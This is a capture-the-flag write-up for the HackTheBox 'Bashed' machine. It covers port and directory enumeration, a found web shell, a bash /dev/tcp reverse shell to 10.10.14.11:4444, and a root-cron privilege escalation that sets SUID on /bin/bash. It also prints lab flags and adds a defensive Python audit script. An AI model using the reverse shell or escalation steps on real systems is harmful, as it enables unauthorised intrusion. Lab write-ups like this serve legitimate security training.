# Bashed

![](/files/nSHT8q5nwMzzwFmsQpZa)

## Enumeration

As usual, we start with an nmap scan in order to find the open ports on the target machine.

The following nmap command scans the target machine quickly, looking for open ports, and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.68 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scan the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of the nmap timing templates.
* `-Pn` skip host discovery and assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Mon Mar  7 21:31:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.68
Warning: 10.10.10.68 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.68
Host is up (0.065s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Mon Mar  7 21:31:26 2022 -- 1 IP address (1 host up) scanned in 16.14 seconds
```

As we see, only port 80 (*HTTP*) is open. Let's try to obtain more information about the service and version running on that port.

> nmap -sC -sV -p80 10.10.10.68 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Mon Mar  7 21:32:12 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar  7 21:32:21 2022 -- 1 IP address (1 host up) scanned in 8.98 seconds
```

Let's take a look at the website.

![](/files/Nh49hCBWCnYn10wVxar5)

There isn't much going on here. Let's enumerate directories with *gobuster*.

> gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/07 21:44:27 Starting gobuster in directory enumeration mode
===============================================================
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/] 
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/server-status        (Status: 403) [Size: 299]                                 
                                                                                
===============================================================
2022/03/07 21:46:17 Finished
===============================================================
```

## Exploitation

If we take a look at the `/dev` directory, we should see a few *PHP* files.

![](/files/CCVdGc9ENIdmRc3ivBtt)

Clicking on the `phpbash.php` file reveals a web shell.

![](/files/RS4UJQTxHtwhRtiTArqN)

Let's get a reverse shell. First, let's set a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Then, on the web shell, we execute the following to get a reverse shell back to our listener and read the user flag.

> bash -c "bash -i >%26 /dev/tcp/10.10.14.11/4444 0>%261"

```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 39324
bash: cannot set terminal process group (762): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ whoami
whoami
www-data
bash-4.3$ cat /home/arrexel/user.txt
cat /home/arrexel/user.txt
2c281f318555dbc1b856957c7147bfc1
```

## Privilege Escalation

Let's start the privilege escalation phase by listing the *sudo* privileges of the `www-data` user.

> sudo -l

* `-l` list user **privileges**.

```
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```

We can execute any command as the `scriptmanager` user. Let's get a shell as the `scriptmanager` user.

> sudo -u scriptmanager bash

```
bash-4.3$ whoami
whoami
scriptmanager
```

If we list the files owned by `scriptmanager`, we will find the `test.py` file in the `/scripts` folder. Looking inside that folder, we also see a file owned by `root`.

> ls -l /scripts

```
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 43 Mar  7 13:49 test.py
-rw-r--r-- 1 root          root          12 Mar  7 13:48 test.txt
```

Let's see the contents of the `test.py` and `test.txt` files.

> cat /scripts/test.py

```python
f = open("test.txt", "w")
f.write("testing 123!")
f.close
```

> cat /scripts/test.txt

```
testing 123!
```

Since `test.txt` is owned by `root` but is written by `test.py`, there must be some scheduled task executed by `root` which runs the script. The idea is to modify the `/scripts/test.py` script, which we own, so that it sets the *SUID* bit on the `/bin/bash` binary; when `root` next executes it, the permissions of *bash* will change.

> nano /scripts/test.py

```python
import os
os.system("chmod +s /bin/bash")
```

Now all we have to do is wait until the *SUID* bit appears on the `/bin/bash` binary.

> ls -l /bin/bash

```
-rwsr-sr-x 1 root root 1037528 Jun 24  2016 /bin/bash
```

Finally, all we have to do is execute *bash* in privileged mode so that it keeps the owner's effective UID, and grab the root flag.

> bash -p

* `-p` **privileged** mode: bash does not drop the effective user ID to the real user ID, so the SUID bit actually grants a root shell.

```
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
cc4f0afe3a1026d402ba10329674a8e2
```
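From a defender's point of view, the escalation above relies on two auditable conditions: a script that `root` runs on a schedule is modifiable by a non-root user, and a SUID bit shows up on a binary that should never carry one. The following is an added example (not part of the write-up) of a small Python audit for both; the `EXPECTED_SUID` allowlist and the `make_demo_tree()` fixture are constructed for illustration.

```python
import os
import stat
import tempfile

ROOT_UID = 0
# Hypothetical allowlist of setuid basenames a host is expected to carry.
EXPECTED_SUID = ("passwd", "sudo", "su")


def _alterable_by_non_root(st):
    """Reasons a file or directory can be altered by someone other than root."""
    reasons = []
    if st.st_uid != ROOT_UID:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group- or world-writable")
    return reasons


def audit_root_script(path):
    """Check a script that root runs on a schedule. The parent directory matters
    too: if it is writable, the file can be replaced even when it is read-only."""
    reasons = [f"{path}: {r}" for r in _alterable_by_non_root(os.stat(path))]
    parent = os.path.dirname(os.path.abspath(path))
    reasons += [f"{parent}: {r}" for r in _alterable_by_non_root(os.stat(parent))]
    return reasons


def unexpected_suid(root_dir, allowlist=EXPECTED_SUID):
    """List regular files under root_dir with the setuid bit whose basename is
    not allowlisted; a shell gaining that bit is exactly the outcome to catch."""
    found = []
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)  # lstat: do not follow symlinks planted by a user
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and name not in allowlist:
                found.append(full)
    return sorted(found)


def make_demo_tree():
    """Constructed fixture mirroring the box: a world-writable scripts/test.py,
    an allowlisted setuid bin/passwd and a setuid bin/bash that should not be."""
    base = tempfile.mkdtemp()
    for sub in ("scripts", "bin"):
        os.makedirs(os.path.join(base, sub))
    for rel, mode in (("scripts/test.py", 0o666), ("bin/passwd", 0o4755), ("bin/bash", 0o4755)):
        full = os.path.join(base, rel)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, mode)
    return base
```

Run `audit_root_script()` against every command path found in root's crontab and `/etc/cron.*`, and `unexpected_suid("/")` periodically, diffing against the previous run.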
